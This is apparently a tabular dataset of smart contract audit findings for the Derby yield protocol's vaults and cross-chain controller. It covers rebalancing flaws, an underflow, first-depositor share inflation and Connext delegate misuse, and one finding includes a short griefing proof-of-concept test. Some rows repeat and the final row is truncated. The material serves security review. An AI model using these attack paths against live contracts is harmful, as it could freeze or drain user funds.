name
stringlengths
5
231
severity
stringclasses
3 values
description
stringlengths
107
68.2k
recommendation
stringlengths
12
8.75k
impact
stringlengths
3
11.2k
function
stringlengths
15
64.6k
The protocol could not handle multiple vaults correctly
medium
The protocol needs to handle multiple vaults correctly. If there are three vaults (e.g.USDC, USDT, DAI) the protocol needs to rebalance them all without any problems\\nThe protocol needs to invoke pushAllocationsToController() every `rebalanceInterval` to push totalDeltaAllocations from Game to xChainController.\\n`pushAllocationsToController()` invoke `rebalanceNeeded()` to check if a rebalance is needed based on the set interval and it uses the state variable `lastTimeStamp` to do the calculations\\n```\\n function rebalanceNeeded() public view returns (bool) {\\n return (block.timestamp - lastTimeStamp) > rebalanceInterval || msg.sender == guardian;\\n }\\n```\\n\\nBut in the first invoking (for USDC vault) of `pushAllocationsToController()` it will update the state variable `lastTimeStamp` to the current `block.timestamp`\\n```\\nlastTimeStamp = block.timestamp;\\n```\\n\\nNow when you invoke (for DAI vault) `pushAllocationsToController()`. It will revert because of\\n```\\nrequire(rebalanceNeeded(), "No rebalance needed");\\n```\\n\\nSo if the protocol has two vaults or more (USDC, USDT, DAI) you can only do one rebalance every `rebalanceInterval`
Keep tracking the `lastTimeStamp` for every `_vaultNumber` by using an array
The protocol could not handle multiple vaults correctly\\nBoth Users and Game players will lose funds because the MainVault will not rebalance the protocols at the right time with the right values
```\\n function rebalanceNeeded() public view returns (bool) {\\n return (block.timestamp - lastTimeStamp) > rebalanceInterval || msg.sender == guardian;\\n }\\n```\\n
User should not receive rewards for the rebalance period, when protocol was blacklisted, because of unpredicted behaviour of protocol price
medium
User should not receive rewards for the rebalance period, when protocol was blacklisted, because of unpredicted behaviour of protocol price.\\nWhen user allocates derby tokens to some underlying protocol, he receive rewards according to the exchange price of that protocols token. This reward can be positive or negative. Rewards of protocol are set to `Game` contract inside `settleRewards` function and they are accumulated for user, once he calls `rebalanceBasket`.\\n```\\n function storePriceAndRewards(uint256 _totalUnderlying, uint256 _protocolId) internal {\\n uint256 currentPrice = price(_protocolId);\\n if (lastPrices[_protocolId] == 0) {\\n lastPrices[_protocolId] = currentPrice;\\n return;\\n }\\n\\n\\n int256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n int256 nominator = (int256(_totalUnderlying * performanceFee) * priceDiff);\\n int256 totalAllocatedTokensRounded = totalAllocatedTokens / 1E18;\\n int256 denominator = totalAllocatedTokensRounded * int256(lastPrices[_protocolId]) * 100; // * 100 cause perfFee is in percentages\\n\\n\\n if (totalAllocatedTokensRounded == 0) {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = 0;\\n } else {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = nominator / denominator;\\n }\\n\\n\\n lastPrices[_protocolId] = currentPrice;\\n }\\n```\\n\\nEvery time, previous price of protocol is compared with current price.\\nIn case if some protocol is hacked, there is `Vault.blacklistProtocol` function, that should withdraw reserves from protocol and mark it as blacklisted. The problem is that because of the hack it's not possible to determine what will happen with exhange rate of protocol. It can be 0, ot it can be very small or it can be high for any reasons. But protocol still accrues rewards per token for protocol, even that it is blacklisted. Because of that, user that allocated to that protocol can face with accruing very big negative or positive rewards. Both this cases are bad.\\nSo i believe that in case if protocol is blacklisted, it's better to set rewards as 0 for it.\\nExample. 1.User allocated 100 derby tokens for protocol A 2.Before `Vault.rebalance` call, protocol A was hacked which made it exchangeRate to be not real. 3.Derby team has blacklisted that protocol A. 4.Vault.rebalance is called which used new(incorrect) exchangeRate of protocol A in order to calculate `rewardPerLockedToken` 5.When user calls rebalance basket next time, his rewards are accumulated with extremely high/low value.
In case if protocol is blacklisted, then set `rewardPerLockedToken` to 0 inside `storePriceAndRewards` function.
User's rewards calculation is unpredictable.
```\\n function storePriceAndRewards(uint256 _totalUnderlying, uint256 _protocolId) internal {\\n uint256 currentPrice = price(_protocolId);\\n if (lastPrices[_protocolId] == 0) {\\n lastPrices[_protocolId] = currentPrice;\\n return;\\n }\\n\\n\\n int256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n int256 nominator = (int256(_totalUnderlying * performanceFee) * priceDiff);\\n int256 totalAllocatedTokensRounded = totalAllocatedTokens / 1E18;\\n int256 denominator = totalAllocatedTokensRounded * int256(lastPrices[_protocolId]) * 100; // * 100 cause perfFee is in percentages\\n\\n\\n if (totalAllocatedTokensRounded == 0) {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = 0;\\n } else {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = nominator / denominator;\\n }\\n\\n\\n lastPrices[_protocolId] = currentPrice;\\n }\\n```\\n
Malicious users could set allocations to a blacklist Protocol and break the rebalancing logic
medium
`game.sol` pushes `deltaAllocations` to vaults by pushAllocationsToVaults() and it deletes all the value of the `deltas`\\n```\\nvaults[_vaultNumber].deltaAllocationProtocol[_chainId][i] = 0;\\n```\\n\\nMalicious users could set allocations to a blacklist Protocol. If only one of the `Baskets` has a non-zero value to a Protocol on blacklist receiveProtocolAllocations() will revert `receiveProtocolAllocations().receiveProtocolAllocationsInt().setDeltaAllocationsInt()`\\n```\\n function setDeltaAllocationsInt(uint256 _protocolNum, int256 _allocation) internal {\\n require(!controller.getProtocolBlacklist(vaultNumber, _protocolNum), "Protocol on blacklist");\\n deltaAllocations[_protocolNum] += _allocation;\\n deltaAllocatedTokens += _allocation;\\n }\\n```\\n\\nand You won't be able to execute rebalance()
Issue Malicious users could set allocations to a blacklist Protocol and break the rebalancing logic\\nYou should check if the Protocol on the blacklist when Game players `rebalanceBasket()`
The guardian isn't able to restart the protocol manually. `game.sol` loses the value of the `deltas`. The whole system is down.
```\\nvaults[_vaultNumber].deltaAllocationProtocol[_chainId][i] = 0;\\n```\\n
inflate initial share price by initial depositor
medium
initial deposit can be front-runned by non-whitelist address to inflate share price evading the `training` block, then all users after the first (the attacker) will receive no shares in return for their deposit.\\n`training` block inside `deposit` function intended to be set as true right after deployment. This `training` variable is to make sure the early depositor address is in the whitelist, thus negating any malicious behaviour (especially the first initial depositor)\\n```\\nFile: MainVault.sol\\n function deposit(\\n uint256 _amount,\\n address _receiver\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 shares) {\\n if (training) {\\n require(whitelist[msg.sender]);\\n uint256 balanceSender = (balanceOf(msg.sender) * exchangeRate) / (10 ** decimals());\\n require(_amount + balanceSender <= maxTrainingDeposit);\\n }\\n```\\n\\nFirst initial depositor issue is pretty well-known issue in vault share-based token minting for initial deposit which is susceptible to manipulation. This issue arise when the initial vault balance is 0, and initial depositor (attacker) can manipulate this share accounting by donating small amount, thus inflate the share price of his deposit. There are a lot of findings about this initial depositor share issue.\\nEven though the `training` block is (probably) written to mitigate this initial deposit, but since the execution of setting the `training` to be true is not in one transaction, then it's possible to be front-runned by attacker. Then this is again, will make the initial deposit susceptible to attack.\\nThe attack vector and impact is the same as TOB-YEARN-003, where users may not receive shares in exchange for their deposits if the total asset amount has been manipulated through a large “donation”.\\nThe initial exchangeRate is a fixed value set on constructor which is not related to totalSupply, but later it will use this totalSupply\\n```\\nFile: MainVault.sol\\n exchangeRate = _uScale;\\n// rest of code\\n function setXChainAllocationInt(\\n uint256 _amountToSend,\\n uint256 _exchangeRate,\\n bool _receivingFunds\\n ) internal {\\n amountToSendXChain = _amountToSend;\\n exchangeRate = _exchangeRate;\\n\\n if (_amountToSend == 0 && !_receivingFunds) settleReservedFunds();\\n else if (_amountToSend == 0 && _receivingFunds) state = State.WaitingForFunds;\\n else state = State.SendingFundsXChain;\\n }\\n\\nFile: XChainController.sol\\n uint256 totalUnderlying = getTotalUnderlyingVault(_vaultNumber) - totalWithdrawalRequests;\\n uint256 totalSupply = getTotalSupply(_vaultNumber);\\n\\n uint256 decimals = xProvider.getDecimals(vault);\\n uint256 newExchangeRate = (totalUnderlying * (10 ** decimals)) / totalSupply;\\n```\\n
The simplest way around for this is just set the initial `training` to be `true` either in the variable definition or set it in constructor, so the initial depositor will be from the whitelist.\\nor, more common solution for this issue is, require a minimum size for the first deposit and burn a portion of the initial shares (or transfer it to a secure address)
initial depositor can inflate share price, other user (next depositor) can lost their asset
```\\nFile: MainVault.sol\\n function deposit(\\n uint256 _amount,\\n address _receiver\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 shares) {\\n if (training) {\\n require(whitelist[msg.sender]);\\n uint256 balanceSender = (balanceOf(msg.sender) * exchangeRate) / (10 ** decimals());\\n require(_amount + balanceSender <= maxTrainingDeposit);\\n }\\n```\\n
Wrong calculation of `balanceBefore` and `balanceAfter` in deposit method
medium
Deposit method calculate net amount transferred from user. It use `reservedFunds` also in consideration when calculating `balanceBefore` and `balanceAfter` but it is not actually require.\\n```\\n uint256 balanceBefore = getVaultBalance() - reservedFunds;\\n vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 balanceAfter = getVaultBalance() - reservedFunds;\\n uint256 amount = balanceAfter - balanceBefore;\\n```\\n\\nDeposit may fail when `reservedFunds` is greater than `getVaultBalance()`
Issue Wrong calculation of `balanceBefore` and `balanceAfter` in deposit method\\nUse below code. This is correct way of finding net amount transfer by depositor\\n```\\n uint256 balanceBefore = getVaultBalance();\\n vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 balanceAfter = getVaultBalance();\\n uint256 amount = balanceAfter - balanceBefore;\\n```\\n
Deposit may fail when `reservedFunds` is greater than `getVaultBalance()`
```\\n uint256 balanceBefore = getVaultBalance() - reservedFunds;\\n vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 balanceAfter = getVaultBalance() - reservedFunds;\\n uint256 amount = balanceAfter - balanceBefore;\\n```\\n
Vault could `rebalance()` before funds arrive from xChainController
medium
Invoke sendFundsToVault() to Push funds from xChainController to vaults. which is call xTransferToVaults()\\nFor the cross-chain rebalancing `xTransferToVaults()` will execute this logic\\n```\\n // rest of code\\n pushFeedbackToVault(_chainId, _vault, _relayerFee);\\n xTransfer(_asset, _amount, _vault, _chainId, _slippage, _relayerFee);\\n // rest of code\\n```\\n\\n`pushFeedbackToVault()` Is to invoke receiveFunds() `pushFeedbackToVault()` always travel through the slow path\\n`xTransfer()` to transfer funds from one chain to another If fast liquidity is not available, the `xTransfer()` will go through the slow path.\\nThe vulnerability is if the `xcall()` of `pushFeedbackToVault()` excited successfully before `xTransfer()` transfer the funds to the vault, anyone can invoke rebalance() this will lead to rebalancing Vaults with Imperfect funds (this could be true only if funds that are expected to be received from XChainController are greater than `reservedFunds` and `liquidityPerc` together )\\nThe above scenario could be done in two possible cases 1- `xTransfer()` will go through the slow path but because High Slippage the cross-chain message will wait until slippage conditions improve (relayers will continuously re-attempt the transfer execution).\\n2- Connext Team says\\n```\\nAll messages are added to a Merkle root which is sent across chains every 30 mins\\nAnd then those messages are executed by off-chain actors called routers\\n\\nso it is indeed possible that messages are received out of order (and potentially with increased latency in between due to batch times) \\nFor "fast path" (unauthenticated) messages, latency is not a concern, but ordering may still be (this is an artifact of the chain itself too btw)\\none thing you can do is add a nonce to your messages so that you can yourself order them at destination\\n```\\n\\nso `pushFeedbackToVault()` and `xTransfer()` could be added to a different Merkle root and this will lead to executing `receiveFunds()` before funds arrive.
Check if funds are arrived or not
The vault could `rebalance()` before funds arrive from xChainController, this will reduce rewards
```\\n // rest of code\\n pushFeedbackToVault(_chainId, _vault, _relayerFee);\\n xTransfer(_asset, _amount, _vault, _chainId, _slippage, _relayerFee);\\n // rest of code\\n```\\n
`XChainController::sendFundsToVault` can be griefed and leave `XChainController` in a bad state
medium
A user can grief the send funds to vault state transition during by calling `sendFundsToVault` multiple times with the same vault.\\nDuring rebalancing, some vaults might need funds sent to them. They will be in state `WaitingForFunds`. To transition from here any user can trigger `XChainController` to send them funds by calling `sendFundsToVault`.\\nThis is trigger per chain and will transfer funds from `XChainController` to the respective vaults on each chain.\\nAt the end, when the vaults on each chain are processed and either have gotten funds sent to them or didn't need to `sendFundsToVaults` will trigger the state for this `vaultNumber` to be reset.\\nHowever, when transferring funds, there's never any check that this chain has not already been processed. So any user could simply call this function for a vault that either has no funds to transfer or where there's enough funds in `XChainController` and trigger the state reset for the vault.\\nPoC in `xChaincontroller.test.ts`, run after 4.5) Trigger vaults to transfer funds to xChainController:\\n```\\n it('5) Grief xChainController send funds to vaults', async function () {\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n\\n expect(await xChainController.getFundsReceivedState(vaultNumber)).to.be.equal(0);\\n\\n expect(await vault3.state()).to.be.equal(3);\\n\\n // can't trigger state change anymore\\n await expect(xChainController.sendFundsToVault(vaultNumber, slippage, 1000, relayerFee, {value: parseEther('0.1'),})).to.be.revertedWith('Not all funds received');\\n });\\n```\\n
I recommend the protocol either keeps track of which vaults have been sent funds in `XChainController`.\\nor changes so a vault can only receive funds when waiting for them:\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol b/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol\\nindex 8739e24..d475ee6 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol\\n@@ // Remove the line below\\n328,7 // Add the line below\\n328,7 @@ contract MainVault is Vault, VaultToken {\\n /// @notice Step 5 end; Push funds from xChainController to vaults\\n /// @notice Receiving feedback from xController when funds are received, so the vault can rebalance\\n function receiveFunds() external onlyXProvider {\\n// Remove the line below\\n if (state != State.WaitingForFunds) return;\\n// Add the line below\\n require(state == State.WaitingForFunds,stateError);\\n settleReservedFunds();\\n }\\n \\n```\\n
XChainController ends up out of sync with the vault(s) that were supposed to receive funds.\\n`guardian` can resolve this by resetting the states using admin functions but these functions can still be frontrun by a malicious user.\\nUntil this is resolved the rebalancing of the impacted vaults cannot continue.
```\\n it('5) Grief xChainController send funds to vaults', async function () {\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n\\n expect(await xChainController.getFundsReceivedState(vaultNumber)).to.be.equal(0);\\n\\n expect(await vault3.state()).to.be.equal(3);\\n\\n // can't trigger state change anymore\\n await expect(xChainController.sendFundsToVault(vaultNumber, slippage, 1000, relayerFee, {value: parseEther('0.1'),})).to.be.revertedWith('Not all funds received');\\n });\\n```\\n
Protocol is will not work on most of the supported blockchains due to hardcoded WETH contract address.
medium
The WETH address is hardcoded in the `Swap` library.\\nAs stated in the README.md, the protocol will be deployed on the following EVM blockchains - Ethereum Mainnet, Arbitrum, Optimism, Polygon, Binance Smart Chain. While the project has integration tests with an ethereum mainnet RPC, they don't catch that on different chains like for example Polygon saveral functionallities will not actually work because of the hardcoded WETH address in the Swap.sol library:\\n```\\naddress internal constant WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;\\n```\\n
The WETH variable should be immutable in the Vault contract instead of a constant in the Swap library and the Wrapped Native Token contract address should be passed in the Vault constructor on each separate deployment.
Protocol will not work on most of the supported blockchains.
```\\naddress internal constant WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;\\n```\\n
Rebalancing can be indefinitely blocked due to ever-increasing `totalWithdrawalRequests`, causing locking of funds in vaults
medium
Rebalancing can get stuck indefinitely at the `pushVaultAmounts` step due to an error in the accounting of `totalWithdrawalRequests`. As a result, funds will be locked in vaults since requested withdrawals are only executed after a next successful rebalance.\\nFunds deposited to underlying protocols can only be withdrawn from vaults after a next successful rebalance:\\na depositor has to make a withdrawal request first, which is tracked in the current rebalance period;\\nrequested funds can be withdrawn in the next rebalance period.\\nThus, it's critical that rebalancing doesn't get stuck during one of its stages.\\nDuring rebalancing, vaults report their balances to `XChainController` via the pushTotalUnderlyingToController function: the functions sends the current unlocked (i.e. excluding reserved funds) underlying token balance of the vault and the total amount of withdrawn requests in the current period. The latter amount is stored in the `totalWithdrawalRequests` storage variable:\\nthe variable is increased when a new withdrawal request is made;\\nand it's set to 0 after the vault has been rebalanced-it's value is added to the reserved funds.\\nThe logic of `totalWithdrawalRequests` is that it tracks only the requested withdrawal amounts in the current period-this amount becomes reserved during rebalancing and is added to `reservedFunds` after the vault has been rebalanced.\\nWhen `XChainController` receives underlying balances and withdrawal requests from vaults, it tracks them internally. The amounts then used to calculate how much tokens a vault needs to send or receive after a rebalancing: the total withdrawal amount is subtracted from vault's underlying balance so that it's excluded from the amounts that will be sent to the protocols and so that it could then be added to the reserved funds of the vault.\\nHowever, `totalWithdrawalRequests` in `XChainController` is not reset between rebalancings: when a new rebalancing starts, `XChainController` receives allocations from the Game and calls `resetVaultUnderlying`, which resets the underlying balances receive from vaults in the previous rebalancing. `resetVaultUnderlying` doesn't set `totalWithdrawalRequests` to 0:\\n```\\nfunction resetVaultUnderlying(uint256 _vaultNumber) internal {\\n vaults[_vaultNumber].totalUnderlying = 0;\\n vaultStage[_vaultNumber].underlyingReceived = 0;\\n vaults[_vaultNumber].totalSupply = 0;\\n}\\n```\\n\\nThis cause the value of `totalWithdrawalRequests` to accumulate over time. At some point, the total historical amount of all withdrawal requests (which `totalWithdrawalRequests` actually tracks) will be greater than the underlying balance of a vault, and this line will revert due to an underflow in the subtraction:\\n```\\nuint256 totalUnderlying = getTotalUnderlyingVault(_vaultNumber) - totalWithdrawalRequests;\\n```\\n
In `XChainController.resetVaultUnderlying`, consider setting `vaults[_vaultNumber].totalWithdrawalRequests` to 0. `totalWithdrawalRequests`, like its `MainVault.totalWithdrawalRequests` counterpart, tracks withdrawal requests only in the current period and should be reset to 0 between rebalancings.
Due to accumulation of withdrawal request amounts in the `totalWithdrawalRequests` variable, `XChainController.pushVaultAmounts` can be blocked indefinitely after the value of `totalWithdrawalRequests` has grown bigger than the value of `totalUnderlying` of a vault. Since withdrawals from vaults are delayed and enable in a next rebalancing period, depositors may not be able to withdraw their funds from vaults, due to a block rebalancing.\\nWhile `XChainController` implements a bunch of functions restricted to the guardian that allow the guardian to push a rebalancing through, neither of these functions resets the value of `totalWithdrawalRequests`. If `totalWithdrawalRequests` becomes bigger than `totalUnderlying`, the guardian won't be able to fix the state of `XChainController` and push the rebalancing through.
```\\nfunction resetVaultUnderlying(uint256 _vaultNumber) internal {\\n vaults[_vaultNumber].totalUnderlying = 0;\\n vaultStage[_vaultNumber].underlyingReceived = 0;\\n vaults[_vaultNumber].totalSupply = 0;\\n}\\n```\\n
Wrong type casting leads to unsigned integer underflow exception when current price is < last price
medium
When the current price of a locked token is lower than the last price, the Vault.storePriceAndRewards will revert because of the wrong integer casting.\\nThe following line appears in Vault.storePriceAndRewards:\\n```\\nint256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n```\\n\\nIf lastPrices[_protocolId] is higher than the currentPrice, the solidity compiler will revert due the underflow of subtracting unsigned integers because it will first try to calculate the result of `currentPrice - lastPrices[_protocolId]` and then try to cast it to int256.
Casting should be performed in the following way to avoid underflow and to allow the priceDiff being negative:\\n```\\nint256 priceDiff = int256(currentPrice) - int256(lastPrices[_protocolId]));\\n```\\n
The rebalance will fail when the current token price is less than the last one stored.
```\\nint256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n```\\n
withdrawal request override
medium
It is possible that a withdrawal request is overridden during the initial phase.\\nUsers have two options to withdraw: directly or request a withdrawal if not enough funds are available at the moment.\\nWhen making a `withdrawalRequest` it is required that the user has `withdrawalRequestPeriod` not set:\\n```\\n function withdrawalRequest(\\n uint256 _amount\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 value) {\\n UserInfo storage user = userInfo[msg.sender];\\n require(user.withdrawalRequestPeriod == 0, "Already a request");\\n\\n value = (_amount * exchangeRate) / (10 ** decimals());\\n\\n _burn(msg.sender, _amount);\\n\\n user.withdrawalAllowance = value;\\n user.withdrawalRequestPeriod = rebalancingPeriod;\\n totalWithdrawalRequests += value;\\n }\\n```\\n\\nThis will misbehave during the initial period when `rebalancingPeriod` is 0. The check will pass, so if invoked multiple times, it will burn users' shares and overwrite the value.
Require `rebalancingPeriod` != 0 in `withdrawalRequest`, otherwise, force users to directly withdraw.
While not very likely to happen, the impact would be huge, because the users who invoke this function several times before the first rebalance, would burn their shares and lose previous `withdrawalAllowance`. The protocol should prevent such mistakes.
```\\n function withdrawalRequest(\\n uint256 _amount\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 value) {\\n UserInfo storage user = userInfo[msg.sender];\\n require(user.withdrawalRequestPeriod == 0, "Already a request");\\n\\n value = (_amount * exchangeRate) / (10 ** decimals());\\n\\n _burn(msg.sender, _amount);\\n\\n user.withdrawalAllowance = value;\\n user.withdrawalRequestPeriod = rebalancingPeriod;\\n totalWithdrawalRequests += value;\\n }\\n```\\n
Anyone can execute certain functions that use cross chain messages and potentially cancel them with potential loss of funds.
high
Certain functions that route messages cross chain on the `Game` and `MainVault` contract are unprotected (anyone can call them under the required state of the vaults). The way the cross chain messaging is implemented in the XProvider makes use of Connext's `xcall()` and sets the `msg.sender` as the `delegate` and `msg.value` as `relayerFee`. There are two possible attack vectors with this:\\nEither an attacker can call the function and set the msg.value to low so it won't be relayed until someone bumps the fee (Connext allows anyone to bump the fee). This however means special action must be taken to bump the fee in such a case.\\nOr the attacker can call the function (which irreversibly changes the state of the contract) and as the delegate of the `xcall` cancel the message. This functionality is however not yet active on Connext, but the moment it is the attacker will be able to change the state of the contract on the origin chain and make the cross chain message not execute on the destination chain leaving the contracts on the two chains out of synch with possible loss of funds as a result.\\nThe `XProvider` contract's `xsend()` function sets the `msg.sender` as the delegate and `msg.value` as `relayerFee`\\n```\\n uint256 relayerFee = _relayerFee != 0 ? _relayerFee : msg.value;\\n IConnext(connext).xcall{value: relayerFee}(\\n _destinationDomain, // _destination: Domain ID of the destination chain\\n target, // _to: address of the target contract\\n address(0), // _asset: use address zero for 0-value transfers\\n msg.sender, // _delegate: address that can revert or forceLocal on destination\\n 0, // _amount: 0 because no funds are being transferred\\n 0, // _slippage: can be anything between 0-10000 because no funds are being transferred\\n _callData // _callData: the encoded calldata to send\\n );\\n }\\n```\\n\\n`xTransfer()` using `msg.sender` as delegate:\\n```\\n IConnext(connext).xcall{value: (msg.value - _relayerFee)}(\\n _destinationDomain, // _destination: Domain ID of the destination chain\\n _recipient, // _to: address receiving the funds on the destination\\n _token, // _asset: address of the token contract\\n msg.sender, // _delegate: address that can revert or forceLocal on destination\\n _amount, // _amount: amount of tokens to transfer\\n _slippage, // _slippage: the maximum amount of slippage the user will accept in BPS (e.g. 30 = 0.3%)\\n bytes("") // _callData: empty bytes because we're only sending funds\\n );\\n }\\n```\\n\\nConnext documentation explaining:\\n```\\nparams.delegate | (optional) Address allowed to cancel an xcall on destination.\\n```\\n\\nConnext documentation seems to indicate this functionality isn't active yet though it isn't clear whether that applies to the cancel itself or only the bridging back the funds to the origin chain.
Provide access control limits to the functions sending message across Connext so only the Guardian can call these functions with the correct msg.value and do not use msg.sender as a delegate but rather a configurable address like the Guardian.
An attacker can call certain functions which leave the relying contracts on different chains in an unsynched state, with possible loss of funds as a result (mainly on XChainControleler's `sendFundsToVault()` when actual funds are transferred.
```\\n uint256 relayerFee = _relayerFee != 0 ? _relayerFee : msg.value;\\n IConnext(connext).xcall{value: relayerFee}(\\n _destinationDomain, // _destination: Domain ID of the destination chain\\n target, // _to: address of the target contract\\n address(0), // _asset: use address zero for 0-value transfers\\n msg.sender, // _delegate: address that can revert or forceLocal on destination\\n 0, // _amount: 0 because no funds are being transferred\\n 0, // _slippage: can be anything between 0-10000 because no funds are being transferred\\n _callData // _callData: the encoded calldata to send\\n );\\n }\\n```\\n
Wrong type casting leads to unsigned integer underflow exception when current price is < last price
high
When the current price of a locked token is lower than the last price, the Vault.storePriceAndRewards will revert because of the wrong integer casting.\\nThe following line appears in Vault.storePriceAndRewards:\\n```\\nint256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n```\\n\\nIf lastPrices[_protocolId] is higher than the currentPrice, the solidity compiler will revert due the underflow of subtracting unsigned integers because it will first try to calculate the result of `currentPrice - lastPrices[_protocolId]` and then try to cast it to int256.
Casting should be performed in the following way to avoid underflow and to allow the priceDiff being negative:\\n```\\nint256 priceDiff = int256(currentPrice) - int256(lastPrices[_protocolId]));\\n```\\n
The rebalance will fail when the current token price is less than the last one stored.
```\\nint256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n```\\n
Not all providers claim the rewards
high
Providers wrongly assume that the protocols will no longer incentivize users with extra rewards.\\nAmong the current providers only the `CompoundProvider` claims the `COMP` incentives, others leave the claim function empty:\\n```\\n function claim(address _aToken, address _claimer) public override returns (bool) {}\\n```\\n
Adjust the providers to be ready to claim the rewards if necessary.
The implementations of the providers are based on the current situation. They are not flexible enough to support the rewards in case the incentives are back.
```\\n function claim(address _aToken, address _claimer) public override returns (bool) {}\\n```\\n
withdrawal request override
medium
It is possible that a withdrawal request is overridden during the initial phase.\\nUsers have two options to withdraw: directly or request a withdrawal if not enough funds are available at the moment.\\nWhen making a `withdrawalRequest` it is required that the user has `withdrawalRequestPeriod` not set:\\n```\\n function withdrawalRequest(\\n uint256 _amount\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 value) {\\n UserInfo storage user = userInfo[msg.sender];\\n require(user.withdrawalRequestPeriod == 0, "Already a request");\\n\\n value = (_amount * exchangeRate) / (10 ** decimals());\\n\\n _burn(msg.sender, _amount);\\n\\n user.withdrawalAllowance = value;\\n user.withdrawalRequestPeriod = rebalancingPeriod;\\n totalWithdrawalRequests += value;\\n }\\n```\\n\\nThis will misbehave during the initial period when `rebalancingPeriod` is 0. The check will pass, so if invoked multiple times, it will burn users' shares and overwrite the value.
Require `rebalancingPeriod` != 0 in `withdrawalRequest`, otherwise, force users to directly withdraw.
While not very likely to happen, the impact would be huge, because the users who invoke this function several times before the first rebalance, would burn their shares and lose previous `withdrawalAllowance`. The protocol should prevent such mistakes.
```\\n function withdrawalRequest(\\n uint256 _amount\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 value) {\\n UserInfo storage user = userInfo[msg.sender];\\n require(user.withdrawalRequestPeriod == 0, "Already a request");\\n\\n value = (_amount * exchangeRate) / (10 ** decimals());\\n\\n _burn(msg.sender, _amount);\\n\\n user.withdrawalAllowance = value;\\n user.withdrawalRequestPeriod = rebalancingPeriod;\\n totalWithdrawalRequests += value;\\n }\\n```\\n
An inactive vault can disrupt rebalancing of active vaults
medium
An inactive vault can send its total underlying amount to the `XChainController` and disrupt rebalancing of active vaults by increasing the `underlyingReceived` counter:\\nif `pushVaultAmounts` is called before `underlyingReceived` overflows, rebalancing of one of the active vault may get stuck since the vault won't receive XChain allocations;\\nif `pushVaultAmounts` after all active vaults and at least one inactive vault has reported their underlying amounts, rebalancing of all vaults will get stuck.\\nRebalancing of vaults starts when Game.pushAllocationsToController is called. The function sends the allocations made by gamers to the `XChainController`. `XChainController` receives them in the receiveAllocationsFromGame function. In the settleCurrentAllocation function, a vault is marked as inactive if it has no allocations and there are no new allocations for the vault. `receiveAllocationsFromGameInt` remembers the number of active vaults.\\nThe next step of the rebalancing process is reporting vault underlying token balances to the `XChainController` by calling MainVault.pushTotalUnderlyingToController. As you can see, the function can be called in an inactive vault (the only modifier of the function, `onlyWhenIdle`, doesn't check that `vaultOff` is false). `XChainController` receives underlying balances in the setTotalUnderlying function: notice that the function increases the number of balances it has received.\\nNext step is the XChainController.pushVaultAmounts function, which calculates how much tokens each vault should receive after gamers have changed their allocations. The function can be called only when all active vaults have reported their underlying balances:\\n```\\nmodifier onlyWhenUnderlyingsReceived(uint256 _vaultNumber) {\\n require(\\n vaultStage[_vaultNumber].underlyingReceived == vaultStage[_vaultNumber].activeVaults,\\n "Not all underlyings received"\\n );\\n _;\\n}\\n```\\n\\nHowever, as we saw above, inactive vaults can also report their underlying balances and increase the `underlyingReceived` counter-if this is abused mistakenly or intentionally (e.g. by a malicious actor), vaults may end up in a corrupted state. Since all the functions involved in rebalancing are not restricted (including `pushTotalUnderlyingToController` and pushVaultAmounts), a malicious actor can intentionally disrupt accounting of vaults or block a rebalancing.
In the `MainVault.pushTotalUnderlyingToController` function, consider disallowing inactive vaults (vaults that have `vaultOff` set to true) report their underlying balances.
If an inactive vault reports its underlying balances instead of an active vault (i.e. `pushVaultAmounts` is called when `underlyingReceived` is equal activeVaults), the active vault will be excluded from rebalancing and it won't receive updated allocations in the current period. Since the rebalancing interval is 2 weeks, the vault will lose the increased yield that might've been generated thanks to new allocations.\\nIf an inactive vault reports its underlying balances in addition to all active vaults (i.e. `pushVaultAmounts` is called when `underlyingReceived` is greater than activeVaults), then `pushVaultAmounts` will always revert and rebalancing will get stuck.
```\\nmodifier onlyWhenUnderlyingsReceived(uint256 _vaultNumber) {\\n require(\\n vaultStage[_vaultNumber].underlyingReceived == vaultStage[_vaultNumber].activeVaults,\\n "Not all underlyings received"\\n );\\n _;\\n}\\n```\\n
Rebalancing can be indefinitely blocked due to ever-increasing `totalWithdrawalRequests`, causing locking of funds in vaults
medium
